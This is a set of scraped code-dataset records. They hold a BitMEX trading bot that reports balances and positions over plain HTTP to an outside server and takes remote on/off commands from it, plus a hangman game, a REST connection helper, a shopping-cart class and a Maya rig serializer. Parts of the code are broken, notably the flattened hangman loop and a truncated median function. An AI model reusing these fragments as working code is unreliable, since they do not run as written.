self.running_qty = self.exchange.get_delta()\r\n            intContractPosition = self.running_qty\r\n            rate = intContractPosition / intBalancePosition *100\r\n            if intContractPosition != 0 and rate > 90: # most of the order (80%+) should have filled before we proceed\r\n                intAvgPurchasePrice = round(float(position['avgCostPrice']), 2)\r\n                if intAvgPurchasePrice > 0:\r\n                    break\r\n        # print(intAvgPurchasePrice)\r\n        now = datetime.now()\r\n        strPurchaseTime = now.strftime('%Y-%m-%d %H:%M:%S')\r\n        if intAvgPurchasePrice < 0:\r\n            self.exchange.cancel_all_orders() # cancel the order\r\n\r\n\r\n    # send trade information to the monitoring server\r\n    def sendTradeVal(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global recent_process_time, SYMBOL\r\n        recent_process_time = int(round(time.time()))# record the most recent run time\r\n        state = 2 # 0 profit report, 1 price info, 2 trade info\r\n        path = \"http://btcatm.cafe24.com/bcfree9/in1.php?serial=\" + serial\r\n\r\n        userdata = {\"state\": state, \"serial\": serial, \"c1\": \"time\", \"c2\": SYMBOL, \"c3\": floatBTCPrice, \"c4\": float(floatBalanceXBT), \"c5\": floatDelta, \"c6\": intContractPosition, \"c7\": str(str(floatProfitRate) + \";\" + str(recent_profit_time)), \"c8\": intAvgPurchasePrice, \"c9\": LiqPrice, \"c10\": intPurchasePrice, \"c11\": LEVERAGE, \"c12\": RECENT_PROFIT_TIME_GAP, \"c13\": PRICE_SAVE_CNT_LIMIT, \"c14\": PriceCalclater.RANGE, \"c15\": PriceCalclater.POSITION_CNT, \"c16\": PriceCalclater.COMMISSION, \"c17\": 0, \"c18\": 0}\r\n        resp = requests.post(path, params=userdata)\r\n        #print('resp ', resp)\r\n\r\n    # send the profit report\r\n    def sendProfit(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n\r\n        state = 0 # 0 profit report, 1 price info, 2 trade info\r\n        path = \"http://btcatm.cafe24.com/bcfree9/in1.php?serial=\" + serial\r\n\r\n        # XBT balance after selling\r\n        floatBalanceXBTSecond = float(floatBalanceXBT)\r\n        profit = round((floatBalanceXBTSecond - floatBalanceXBTFirst) / floatBalanceXBTFirst * 100, 5)\r\n\r\n        # time, first price, total buy amount, buy ratio\r\n        delta = round(intContractPosition / floatBTCPrice, 5)\r\n        purchase_sum_rate = round((delta / LEVERAGE) / floatBalanceXBT * 100, 2)\r\n        # profit = floatProfitRate + COMMISION\r\n        profitTotal = round((delta * profit / 100) / floatBalanceXBT * 100, 5)\r\n        # print('settings.SYMBOL', settings.SYMBOL)\r\n        userdata = {\"state\": state, \"serial\": serial, \"c1\": \"time\", \"c2\": intPurchasePrice, \"c3\": intContractPosition, \"c4\": round(intAvgPurchasePrice, 1), \"c5\": 0, \"c6\": profit, \"c7\": floatBalanceXBTSecond, \"c8\": \"0\", \"c9\": \"0\", \"c10\": settings.SYMBOL}\r\n        resp = requests.post(path, params=userdata)\r\n
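        # worked example (sketch, illustrative numbers): 1.00 XBT before buying and 1.02 XBT\r\n        # after selling -> profit = (1.02 - 1.00) / 1.00 * 100 = 2.0 percent\r\n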
    ###\r\n    # Running\r\n    ###\r\n    def getMovingAvg(self):\r\n        # Print('//////////////' + getframeinfo(currentframe()).function + '//////////////')\r\n        global arrBTCPriceMovingAvg, arrBTCTimeMovingAvg, arrBTCCandleMovingAvg, arrBTCRangeMovingAvg\r\n        for a in range(10):\r\n            arrBTCPriceMovingAvg = []\r\n            arrBTCTimeMovingAvg = []\r\n            (arrBTCPriceMovingAvg, arrBTCTimeMovingAvg, arrBTCCandleMovingAvg, arrBTCRangeMovingAvg) = getCandleAvgMoveBitmex.getBTCPrice(AVG_MOVING_RANGE)\r\n            print(arrBTCPriceMovingAvg)\r\n            print(arrBTCTimeMovingAvg)\r\n            if len(arrBTCPriceMovingAvg) > 0:\r\n                break\r\n            sleep(3)\r\n\r\n    def getTimeSub(self, time1, time2):\r\n        time1 = datetime(int(time1[:4]), int(time1[5:7]), int(time1[8:10]), int(time1[11:13]), int(time1[14:16]), int(time1[17:19]))\r\n        time2 = datetime(int(time2[:4]), int(time2[5:7]), int(time2[8:10]), int(time2[11:13]), int(time2[14:16]), int(time2[17:19]))\r\n        return ((time1 - time2).days * 86400 + (time1 - time2).seconds)\r\n
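\r\n    # A terser equivalent of getTimeSub (sketch; assumes the same '%Y-%m-%d %H:%M:%S' format):\r\n    #   fmt = '%Y-%m-%d %H:%M:%S'\r\n    #   return int((datetime.strptime(time1, fmt) - datetime.strptime(time2, fmt)).total_seconds())\r\n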
\r\n    def setLongShort(self):\r\n        global is_Long\r\n        now = datetime.now()\r\n        time_ = now.strftime('%Y-%m-%d %H:%M:%S')\r\n        idx = 0\r\n        # for a in range(len(arrBTCTimeMovingAvg)):\r\n        #     print(time_, arrBTCTimeMovingAvg[a])\r\n        #     if self.getTimeSub(time_, arrBTCTimeMovingAvg[a]) < 0:\r\n        #         # print(a, arrBTCTime[cnt], arrBTCTimeMovingAvg[a-1])\r\n        #         # if arrBTCTime[cnt][:10] == arrBTCTimeMovingAvg[a][:10]:\r\n        #         idx = a - 1\r\n        #         if idx < 0:\r\n        #             idx = 0\r\n        #         break\r\n        # exit()\r\n        if intPurchasePrice < arrBTCPriceMovingAvg[len(arrBTCPriceMovingAvg) - 1]: # current price < moving average -> go long\r\n            is_Long = True\r\n            print('Now it is Long')\r\n        else:\r\n            is_Long = False\r\n            print('Now it is Short')\r\n\r\n        # is_Long = False\r\n\r\n    def place_purchase_orders(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global intLastOrderPrice, SellSigned, BuySigned\r\n\r\n        if start_state == STOP_AFTER_SELL:\r\n            raise SystemExit('STOP after sell')\r\n        intLastOrderPrice = 0 # last order price\r\n        SellSigned = 0 # filled sell quantity\r\n        if is_Long:\r\n            buy_orders = []\r\n            sell_orders = [1234567] # 1234567 is a sentinel: leave this side's orders untouched\r\n            index = - 1\r\n            intPurchasePrice = start_position_sell + 10\r\n        else:\r\n            buy_orders = [1234567]\r\n            sell_orders = [] # 1234567 is a sentinel: leave this side's orders untouched\r\n            index = 1\r\n            intPurchasePrice = start_position_sell - 10\r\n        # Create orders from the outside in. This is intentional - let's say the inner order gets taken;\r\n        # then we match orders from the outside in, ensuring the fewest number of orders are amended and only\r\n        # a new order is created in the inside. If we did it inside-out, all orders would be amended\r\n        # down and a new order would be created at the outside.\r\n        weight_ = int(((intBalancePosition / floatBTCPrice) - floatDelta) * floatBTCPrice * LEVERAGE * 0.95)\r\n        # print(intPurchasePrice, weight_, LEVERAGE)\r\n\r\n        order = {'price': intPurchasePrice, 'orderQty': weight_, 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n        print('Purchase order', order)\r\n        if is_Long:\r\n            buy_orders.append(order)\r\n        else:\r\n            sell_orders.append(order)\r\n        intLastOrderPrice = floatBTCPrice\r\n        return self.converge_orders(buy_orders, sell_orders)\r\n\r\n    def place_sell_orders(self, profit_rate):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global intSellPrice, is_sell, floatTotalProfit, floatBalanceXBTFirst\r\n        is_sell = False\r\n        sleep(2)\r\n        floatTotalProfit = intContractPosition\r\n        if not is_Long:\r\n            contract = BuySigned - SellSigned\r\n            buy_orders = []\r\n            sell_orders = [1234567] # sentinel: leave this side's orders untouched\r\n            index = - 1\r\n        else:\r\n            contract = -(BuySigned - SellSigned)\r\n            buy_orders = [1234567]\r\n            sell_orders = [] # sentinel: leave this side's orders untouched\r\n            index = 1\r\n        # print(intAvgPurchasePrice)\r\n        # print(profit_rate)\r\n        # print(intAvgPurchasePrice * (1 + (profit_rate + COMMISION) / 100), intAvgPurchasePrice, profit_rate)\r\n        if is_Long:\r\n            intSellPrice = PriceCalclater.getCeilNum(intAvgPurchasePrice * (1 + (profit_rate + COMMISION) / 100))\r\n        else:\r\n            intSellPrice = PriceCalclater.getFloorNum(intAvgPurchasePrice * (1 - (profit_rate + COMMISION) / 100))\r\n        order = {'price': intSellPrice, 'orderQty': (intContractPosition), 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n        print('Sell order', order)\r\n        if abs(intContractPosition) > 0:\r\n            if not is_Long:\r\n                buy_orders.append(order)\r\n            else:\r\n                sell_orders.append(order)\r\n\r\n        return self.converge_orders(buy_orders, sell_orders)\r\n\r\n    def place_sell_orders_losscut(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global intSellPrice, is_sell, floatTotalProfit, floatBalanceXBTFirst\r\n        is_sell = False\r\n        sleep(2)\r\n        floatTotalProfit = intContractPosition\r\n        is_loss_cut = False\r\n\r\n        # has the price fallen below the loss-cut rate?\r\n        if is_Long and floatBTCPrice > 0:\r\n            profit_rate = round(((floatBTCPrice - intAvgPurchasePrice) / intAvgPurchasePrice * 100 - COMMISION), 2)\r\n        elif not is_Long and floatBTCPrice > 0:\r\n            profit_rate = round(-((floatBTCPrice - intAvgPurchasePrice) / intAvgPurchasePrice * 100 - COMMISION), 2)\r\n        if profit_rate < -abs(floatLossCutRate):\r\n            is_loss_cut = True\r\n            print('Loss cut: price has fallen too far', profit_rate)\r\n\r\n        # has the maximum holding time elapsed?\r\n        if len(strPurchaseTime) > 5:\r\n            now = datetime.now()\r\n            nowTime = now.strftime('%Y-%m-%d %H:%M:%S')\r\n            if self.getTimeSub(nowTime, strPurchaseTime) > settings.LOSS_CUT_WAITING_TIME:\r\n                is_loss_cut = True\r\n                print('Loss cut: holding time exceeded')\r\n\r\n        if is_loss_cut: # execute the loss cut\r\n            self.exchange.cancel_all_orders()\r\n            if not is_Long:\r\n                buy_orders = []\r\n                sell_orders = [1234567] # sentinel: leave this side's orders untouched\r\n                index = - 1\r\n            else:\r\n                buy_orders = [1234567]\r\n                sell_orders = [] # sentinel: leave this side's orders untouched\r\n                index = 1\r\n            if is_Long:\r\n                intSellPrice = int(floatBTCPrice * 0.95)\r\n            else:\r\n                intSellPrice = int(floatBTCPrice * 1.05)\r\n\r\n            order = {'price': intSellPrice, 'orderQty': abs(intContractPosition), 'side': \"Buy\" if index < 0 else \"Sell\"}\r\n            print('Loss-cut order', order)\r\n\r\n            if abs(intContractPosition) > 0:\r\n                if not is_Long:\r\n                    buy_orders.append(order)\r\n                else:\r\n                    sell_orders.append(order)\r\n            return self.converge_orders(buy_orders, sell_orders)\r\n
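        # no loss cut this pass: fall through and just keep a reference sell price near the market\r\n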
        if is_Long:\r\n            intSellPrice = int(floatBTCPrice * 0.99)\r\n        else:\r\n            intSellPrice = int(floatBTCPrice * 1.01)\r\n\r\n    def chkError(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n        global intPriceSaveCnt, intPriceSave\r\n        if intPriceSaveCnt > 5:\r\n            print(\"Comparing same price: \", int(intPriceSaveCnt), \" times.\")\r\n            # print \"Connecting is \", self.check_connection\r\n\r\n\r\n        # ---1. the same price 40 times in a row means the feed has stalled\r\n        if floatBTCPrice == intPriceSave:\r\n            intPriceSaveCnt += 1\r\n        else:\r\n            intPriceSave = floatBTCPrice\r\n            intPriceSaveCnt = 0\r\n\r\n        if intPriceSaveCnt > PRICE_SAVE_CNT_LIMIT: # the same price 15 times in a row is an error\r\n            print('Same Price ', intPriceSaveCnt, ' times. This is Error')\r\n            is_trade_go = False\r\n            #intPriceSaveCnt = 10\r\n            self.exit()\r\n\r\n        # ---2. liquidation price > average cost would mean an unintended short position\r\n        # if LiqPrice > intAvgPurchasePrice:#\r\n        #     print('LiqPrice is bigger than AVG cost, Error')\r\n        #     #is_trade_go = False\r\n        #     #self.exit()\r\n        #     self.RecoverTradingMiss()\r\n\r\n    def getOnOff(self):\r\n        global recent_profit_time, floatProfitRate, start_state\r\n        url = 'http://btcatm.cafe24.com/bcfree7/out.php?serial=' + serial\r\n        u = urllib.request.urlopen(url)\r\n        data = u.read()\r\n        conn_string = json.loads(data.decode('utf-8'))\r\n        if len(str(conn_string['c_1'])) > 10:\r\n            start_state = int(conn_string['onoff'])\r\n\r\n    def run_loop(self):\r\n        print('/////////////////////////', sys._getframe().f_code.co_name, '/////////////////////////')\r\n\r\n        global isExitImmed, restart_working, SYMBOL\r\n\r\n        is_trade_go = True # becomes the last pass once set to False\r\n        is_first_start = True # first iteration\r\n        isExitImmed = False\r\n        restart_working = True # temp\r\n        self.exchange.cancel_all_orders()\r\n\r\n        while is_trade_go:\r\n            print('//////////////////////----START----////////////////////////////')\r\n            sys.stdout.write(\"-----\\n\")\r\n            sys.stdout.flush()\r\n\r\n            # self.check_file_change()\r\n            sleep(settings.LOOP_INTERVAL)\r\n\r\n            # This will restart on very short downtime, but if it's longer,\r\n            # the MM will crash entirely as it is unable to connect to the WS on boot.\r\n            if not self.check_connection():\r\n                logger.error(\"Realtime data connection unexpectedly closed, restarting.\")\r\n                self.restart()\r\n\r\n            if isExitNextTime:\r\n                is_trade_go = False\r\n                if start_state == STOP_NOW:\r\n                    raise SystemExit('STOP immediately')\r\n                break\r\n            # print('hah')\r\n            self.getOnOff()\r\n            self.sanity_check() # Ensures health of mm - several cut-out points here\r\n            self.print_status() # Print skew, delta, etc\r\n            self.chkError() #Chk Error\r\n\r\n
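            # start_state recap: 0 RUNNING (trade normally), 1 PAUSE, 2 STOP_NOW (abort at once),\r\n            # 3 STOP_AFTER_SELL (close the open position first, then stop)\r\n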
            if start_state == RUNNING or start_state == STOP_AFTER_SELL:\r\n                if not isNowTrade: # normal trading\r\n                    ##2. compute the buy and sell prices#\r\n                    self.exchange.cancel_all_orders()\r\n                    self.exchange.update_margin(settings.SYMBOL, LEVERAGE) # set leverage\r\n\r\n                    ##3. place the purchase order#\r\n                    self.getMovingAvg()\r\n                    self.setLongShort()\r\n                    self.place_purchase_orders()\r\n                    self.get_order_success()\r\n\r\n                elif not is_first_start and isNowTrade:\r\n                    ##4. place the sell orders#\r\n                    self.place_sell_orders(floatProfitRate)\r\n                    self.place_sell_orders_losscut()\r\n                elif is_first_start and isNowTrade: # there is a position to recover\r\n                    ##6. place recovery purchase orders#\r\n                    # self.place_purchase_orders()\r\n\r\n                    self.get_order_success()\r\n\r\n                else:\r\n                    print('Unexpected state??')\r\n            self.sendTradeVal() # send info\r\n            sleep(8)\r\n            is_first_start = False\r\n\r\n    def restart(self):\r\n        logger.info(\"Restarting the market maker...\")\r\n        os.execv(sys.executable, [sys.executable] + sys.argv)\r\n\r\n#\r\n# Helpers\r\n#\r\n\r\n\r\ndef XBt_to_XBT(XBt):\r\n    return float(XBt) / constants.XBt_TO_XBT\r\n\r\n\r\ndef cost(instrument, quantity, price):\r\n    mult = instrument[\"multiplier\"]\r\n    P = mult * price if mult >= 0 else mult / price\r\n    return abs(quantity * P)\r\n\r\n\r\ndef margin(instrument, quantity, price):\r\n    return cost(instrument, quantity, price) * instrument[\"initMargin\"]\r\n\r\n\r\ndef run():\r\n    logger.info('BitMEX Market Maker Version: %s\\n' % constants.VERSION)\r\n    # print('haha')\r\n\r\n    om = OrderManager()\r\n    # Try/except just keeps ctrl-c from printing an ugly stacktrace\r\n    try:\r\n        # print('haha')\r\n\r\n        om.run_loop()\r\n    except (KeyboardInterrupt, SystemExit):\r\n        print()\r\n        # sys.exit()\r\n","sub_path":"market_maker.py","file_name":"market_maker.py","file_ext":"py","file_size_in_byte":41845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"522108229","text":"#!/usr/bin/env python\nimport pygame,sys\nfrom pygame.locals import *\nfrom random import choice as ranlist\npygame.init()\nsize=width , height = 500,500\nscreen=pygame.display.set_mode(size)\nscreen.fill((255,255,255))\nalpha = list(map(chr, range(97, 123)))\nfont = pygame.font.Font('freesansbold.ttf', 32) \nheart=pygame.image.load(\"heart.png\")\nheart=pygame.transform.scale(heart,(50,50))\n# create a text surface object,\n# on which the text is drawn.\n\ndef draw(see):\n    screen.fill((255,255,255))\n    \n    for x in range(lives):\n        screen.blit(heart,[10+(x*48),50]) \n    char=font.render(\" \".join(alpha[:13]), True,(0,0,255))\n    screen.blit(char,[40,350])\n    char=font.render(\" \".join(alpha[13:25]), True,(0,0,255))\n    screen.blit(char,[40,400])\n    char=font.render(\" \".join(see), True,(0,0,255))\n    screen.blit(char,[40,200])\n    pygame.display.flip()\nraw =\"\"\"\"\"\".split()\n###put the main dictionary here###\ndic=['actor', 'airplane', 'airport', 'army', 'baseball', 'beef', 'birthday', 'boy', 'brush', 'bushes', 'butter', 'cast', 'cave', 'cent', 'cherries', 'cherry', 'cobweb', 'coil', 'cracker', 'dinner', 'eggnog', 'elbow', 'face', 'fireman', 'flavor', 'gate', 'glove', 'glue', 'goldfish', 'goose', 'grain', 'hair', 'haircut', 'hobbies', 'holiday', 'hot', 'jellyfish', 'ladybug', 'mailbox', 'number', 'oatmeal', 'pail', 'pancake', 'pear', 'pest', 'popcorn', 'queen', 'quicksand', 'quiet', 'quilt', 'rainstorm', 'scarecrow', 'scarf', 'stream', 'street', 'sugar', 'throne', 'toothpaste', 'twig', 'volleyball', 'wood', 'wrench']\n##################################\ndic+=raw\nwhile True:\n    alpha = list(map(chr, range(97, 123)))\n    word=ranlist(dic)\n    dic.remove(word)\n    origword=[x for x in word]\n    word=[x for x in word]\n    lives=10\n    see=[\"_\"]*len(word)\n    draw(see)\n    while True:\n        #exit cases\n        if origword==see:\n            pygame.time.wait(1000)\n            screen.fill((0,255,25))\n            \n            char=font.render('you won',True,(0,0,0))\n            screen.blit(char,[180,200])\n            pygame.display.flip()\n            pygame.time.wait(1000)\n            break\n        elif lives==0:\n            pygame.time.wait(500)\n            see=origword\n            draw(see)\n            pygame.time.wait(1000)\n            screen.fill((255,0,25))\n            char=font.render('you lose',True,(0,0,0))\n            screen.blit(char,[180,200])\n            pygame.display.flip()\n            pygame.time.wait(1000)\n            break\n
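        # wait for the player's next key press\n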
choice=\"\"\n event=pygame.event.wait()\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n elif event.type==pygame.KEYDOWN:\n choice = str(event.unicode)\n if choice in word :\n while choice in word:\n see[word.index(choice)]=choice\n word[word.index(choice)]=\" \"\n alpha[alpha.index(choice)]=\"-\" \n elif choice in alpha:\n lives-=1\n alpha[alpha.index(choice)]=\"-\"\n draw(see)\n \n","sub_path":"old/stuff/pythonproj/hangman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"186081337","text":"import os \r\nfrom urllib.parse import urlparse\r\n\r\n#_userid = None\r\n#_password = None\r\n_auth = None\r\n_baseurl = None\r\n_url = None\r\n_sslverify = None\r\n_timeout = None \r\n\r\n\r\nclass connection(object): \r\n def __init__(self, auth=\"\", url=\"\", noproxy=True, sslverify=False, timeout=3600, cert=None): \r\n self.auth = auth\r\n if self.auth == \"\":\r\n self.auth = _auth\r\n #self.userid = userid\r\n #if self.userid == \"\":\r\n # self.userid = _userid\r\n #self.password = password\r\n #if self.password == \"\":\r\n # self.password = _password\r\n self.baseurl = url\r\n if self.baseurl == \"\":\r\n self.baseurl = _baseurl\r\n \r\n self.noproxy = noproxy\r\n self.sslverify = sslverify\r\n self.timeout = timeout\r\n self.cert = cert\r\n\r\n self.domain = urlparse(self.baseurl).netloc \r\n self.basepath = '/api/v1'\r\n self.url = self.baseurl+'/ae'+self.basepath \r\n if self.noproxy: \r\n os.environ['NO_PROXY'] = self.domain \r\n \r\n self.init() \r\n \r\n def init(self): \r\n #global _userid, _password\r\n global _auth, _url, _sslverify, _timeout, _baseurl\r\n #_userid = self.userid \r\n #_password = self.password \r\n _auth = self.auth\r\n _url = self.url \r\n _sslverify = self.sslverify\r\n _timeout = self.timeout\r\n _baseurl = self.baseurl \r\n #_cert = self.cert\r\n if self.sslverify == True:\r\n _sslverify = self.cert\r\n else:\r\n _sslverify = self.sslverify\r\n \r\nclass config(object): \r\n def __init__(self): \r\n self.url = _url \r\n self.base64auth = _auth\r\n #self.userid = _userid \r\n #self.password = _password \r\n self.sslverify = _sslverify\r\n self.timeout = _timeout\r\n\r\n def setArgs(self, path, args):\r\n for key, value in args.items():\r\n if key != 'self':\r\n path = path.replace('{'+key+'}', str(value))\r\n return path\r\n\r\n","sub_path":"automic_rest/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189879641","text":"\nclass ShoppingCart:\n # write your code here\n def __init__(self, total=0, employee_discount=None, items=[]):\n self.total = total\n self.employee_discount = employee_discount\n self.items = items\n self.total_spent = sum([i['price']*i['quantity'] for i in items])\n# self.discount_item = discount_item\n# self.discount_price = sum([i['price'] for i in items])\n def add_item(self, name=None, price=None, quantity=1):\n if quantity == 1:\n self.items.append({'name': name, 'price': price})\n else:\n for i in range(0, quantity):\n self.items.append({'name': name, 'price': price})\n self.total_spent += price * quantity\n return self.total_spent\n def mean_item_price(self):\n x = [p['price'] for p in self.items] \n x.sort()\n mean = sum(x) / len(x)\n return mean\n\n def median_item_price(self):\n x = [p['price'] for p in self.items] \n x.sort()\n half = len(x)//2\n b = x[half]\n c = 
    def apply_discount(self):\n        # total after a flat 20% discount\n        x = [p['price'] for p in self.items] \n        discount = sum(x) * .8\n        if discount != 0:\n            return discount\n        else:\n            return \"sorry\"\n    def void_last_item(self):\n        # drop the most recently added entry and refund its price\n        if self.items:\n            item = self.items.pop()\n            self.total_spent -= item['price']\n    def remove_item(self, items, index):\n        return items.pop(index)\n    \n    ","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"274062604","text":"''' Proxy limb serialization/creation module '''\n# Python standard libraries\nimport os\nimport sqlite3\nimport json\nimport shelve\n\n# Maya libraries\nimport pymel.core as pm\n\n# Other libraries\nimport python.general.pyUtils as pyUtils\nimport python.maya.rig.rigUtils as rigUtils\nimport python.maya.general.mayaNaming as mayaNaming\nimport python.maya.rig.modules.modRigUtils as modRigUtils\n\nRESOURCE_DIR = r'C:\Users\pkatzen\Documents\pk_dev01\Python\Maya\Rigging\Modular\Resources'\n\n\nclass ProxyLimb(pyUtils.Printer, object):\n    ''' Proxy limb base class '''\n    _limbInfo = {'spine': ('xyz', 'zdown', 0.25),\n                 'neck': ('xyz', 'zdown', 0.25),\n                 'pelvis': ('xyz', 'zdown', 0.25),\n                 'L_arm': ('xyz', 'yup', 0.25),\n                 'R_arm': ('xyz', 'yup', 0.25),\n                 'L_leg': ('xzy', 'xdown', 0.25),\n                 'R_leg': ('xzy', 'xdown', 0.25),\n                 'L_clavicle': ('xyz', 'yup', 0.25),\n                 'R_clavicle': ('xyz', 'yup', 0.25),\n                 'L_scapula': ('xyz', 'zdown', 0.25),\n                 'R_scapula': ('xyz', 'zdown', 0.25),\n                 'L_inverseFoot': ('xzy', 'xdown', 0.25),\n                 'R_inverseFoot': ('xzy', 'xdown', 0.25),\n                 'L_thumb': ('xyz', 'yup', 0.125),\n                 'L_index': ('xyz', 'yup', 0.125),\n                 'L_middle': ('xyz', 'yup', 0.125),\n                 'L_ring': ('xyz', 'yup', 0.125),\n                 'L_pinky': ('xyz', 'yup', 0.125),\n                 'R_thumb': ('xyz', 'yup', 0.125),\n                 'R_index': ('xyz', 'yup', 0.125),\n                 'R_middle': ('xyz', 'yup', 0.125),\n                 'R_ring': ('xyz', 'yup', 0.125),\n                 'R_pinky': ('xyz', 'yup', 0.125),\n                 'finger': ('xyz', 'yup', 0.125),\n                 'toe': ('xyz', 'yup', 0.125),\n                 'head': ('xyz', 'zdown', 0.25),\n                 'lwrJaw': ('xyz', 'ydown', 0.25),\n                 'eye': ('xyz', 'yup', 0.125)}\n    # Joint orientation vectors\n    _axisVectors = {'x': (1.00, 0.00, 0.00),\n                    'y': (0.00, 1.00, 0.00),\n                    'z': (0.00, 0.00, 1.00)}\n    _upDown = {'up': '+', 'down': '-'}\n    _worldAlignVectors = {'xup': (1.00, 0.00, 0.00), 'xdown': (-1.00, 0.00, 0.00),\n                          'yup': (0.00, 1.00, 0.00), 'ydown': (0.00, -1.00, 0.00),\n                          'zup': (0.00, 0.00, 1.00), 'zdown': (0.00, 0.00, -1.00)}\n    _resourceDir = RESOURCE_DIR\n    _jsonFile = os.path.join(_resourceDir, 'proxyLimbs.json')\n    _dbFile = os.path.join(_resourceDir, 'proxyLimbs.db')\n    _shelveFile = os.path.join(_resourceDir, 'proxyLimbs')\n\n    def registerLimb(self, limbName, ojString, saoString, radius):\n        '''\n        Registers a new limb\n\n        Parameters\n        ----------\n        limbName : string\n            Name of the limb\n        ojString : {'xyz', 'yzx', 'zxy', 'zyx', 'yxz', 'xzy', 'none'}\n            Orient joint string\n        saoString : {'xup', 'xdown', 'yup', 'ydown', 'zup', 'zdown', 'none'}\n            Secondary axis orientation string\n        radius : float\n            Joint radius value\n        '''\n        if limbName not in self._limbInfo.keys():\n            self._limbInfo[limbName] = (ojString, saoString, radius)\n        else:\n            raise KeyError('Key: \"%s\" already exists' % limbName)\n
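\n    # usage sketch (hypothetical limb name): ProxyLimb().registerLimb('L_tail', 'xyz', 'yup', 0.25)\n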
\n    def updateLimb(self, limbName, ojString, saoString, radius):\n        '''\n        Updates limb information\n\n        Parameters\n        ----------\n        limbName : string\n            Name of the limb\n        ojString : {'xyz', 'yzx', 'zxy', 'zyx', 'yxz', 'xzy', 'none'}\n            Orient joint string\n        saoString : {'xup', 'xdown', 'yup', 'ydown', 'zup', 'zdown', 'none'}\n            Secondary axis orientation string\n        radius : float\n            Joint radius value\n        '''\n        if limbName in self._limbInfo.keys():\n            self._limbInfo[limbName] = (ojString, saoString, radius)\n        else:\n            raise KeyError('Invalid key: \"%s\"' % limbName)\n\n    def getLimbInfo(self, limbName):\n        '''\n        Returns information about a limb\n\n        Parameters\n        ----------\n        limbName : string\n            Name of the limb\n\n        Returns\n        -------\n        tuple :\n            (ojString, saoString, radius)\n        '''\n        if limbName in self._limbInfo.keys():\n            return self._limbInfo[limbName]\n\n    def writeLimb(self):\n        raise NotImplementedError('Undefined method: writeLimb()')\n\n    def buildLimb(self):\n        raise NotImplementedError('Undefined method: buildLimb()')\n\n\nclass LimbRecord(object):\n    ''' ProxyLimb record class '''\n    def __init__(self, name, oj, sao, radius, jointInfo):\n        self.name = name\n        self.oj = oj\n        self.sao = sao\n        self.radius = radius\n        self.joints = jointInfo # named 'joints' so LimbBuilder.readShelve() can find it\n\n\nclass LimbWriter(ProxyLimb):\n    ''' ProxyLimb writer class '''\n    def toJson(self):\n        ''' Writes limb information to a JSON file '''\n        ProxyLimbs = {}\n        for key in sorted(self._limbInfo):\n            oj, sao, radius = self._limbInfo[key]\n            # Get limb orientation, radius information\n            ProxyLimbs[key] = {'oj': oj, 'sao': sao,\n                               'radius': radius, 'joints': {}}\n            # Get limb joint names\n            joints = pm.ls('*%s*' % key, type=pm.nt.Joint)\n            names = [each.nodeName().replace('_jnt', '') for each in joints]\n            # Get limb joint positions as tuple\n            positions = [tuple(each.getTranslation('world')) for each in joints]\n            ProxyLimbs[key]['joints'] = dict(zip(names, positions))\n        # Write proxyLimbs.json file\n        with open(self._jsonFile, 'w') as outfile:\n            json.dump(ProxyLimbs, outfile, indent=4, separators=(',', ':'))\n\n    def toDatabase(self):\n        ''' Writes limb information to a database '''\n        conn = sqlite3.connect(self._dbFile)\n        conn.execute('PRAGMA foreign_keys=ON')\n        cursor = conn.cursor(pyUtils.MyCursor)\n        # Create ProxyLimb table\n        cursor.createTable('ProxyLimbs',\n                           ('limbId', 'INTEGER PRIMARY KEY AUTOINCREMENT'),\n                           ('limbType', 'TEXT'),\n                           ('oj', 'TEXT'),\n                           ('sao', 'TEXT'),\n                           ('radius', 'REAL'))\n        # Create ProxyLimbJoints table\n        cursor.createTable('ProxyLimbJoints',\n                           ('limbId', 'INTEGER'),\n                           ('jointId', 'INTEGER PRIMARY KEY AUTOINCREMENT'),\n                           ('jointName', 'TEXT'),\n                           ('translation', 'TEXT'),\n                           ('rotation', 'TEXT'),\n                           ('FOREIGN KEY',\n                            '(limbId) REFERENCES ProxyLimbs (limbId)'))\n        # Populate ProxyLimbs table\n        for key, value in sorted(self._limbInfo.items()):\n            cursor.insert('ProxyLimbs', limbId=None, limbType=key,\n                          oj=value[0], sao=value[1], radius=value[2])\n        # Populate ProxyLimbJoints table\n        for key in self._limbInfo:\n            joints = pm.ls('*%s*' % key, type=pm.nt.Joint)\n            for jnt in joints:\n                jntName = jnt.nodeName().replace('_jnt', '')\n                pos = str(jnt.getTranslation('world'))\n                rot = str(jnt.getRotation('world'))\n                cursor.execute(''' INSERT INTO ProxyLimbJoints\n                               (limbId, jointName, translation, rotation)\n                               VALUES ((SELECT limbId from ProxyLimbs\n                               WHERE limbType = \"%s\"), \"%s\", \"%s\", \"%s\"); '''\n                               % (key, jntName, pos, rot))\n        conn.commit()\n        conn.close()\n\n    def toShelve(self):\n        ''' Writes limb information to a shelve '''\n        outFile = shelve.open(self._shelveFile)\n        for limbName, info in self._limbInfo.items():\n            jointInfo = {}\n            joints = pm.ls('*%s*' % limbName, type=pm.nt.Joint)\n            for j in joints:\n                jntName = j.nodeName()\n                jointInfo[jntName] = j.getTranslation('world')\n            oj, sao, radius = info\n            limbRec = LimbRecord(limbName, oj, sao, radius, jointInfo)\n            outFile[limbName] = limbRec\n        outFile.close()\n
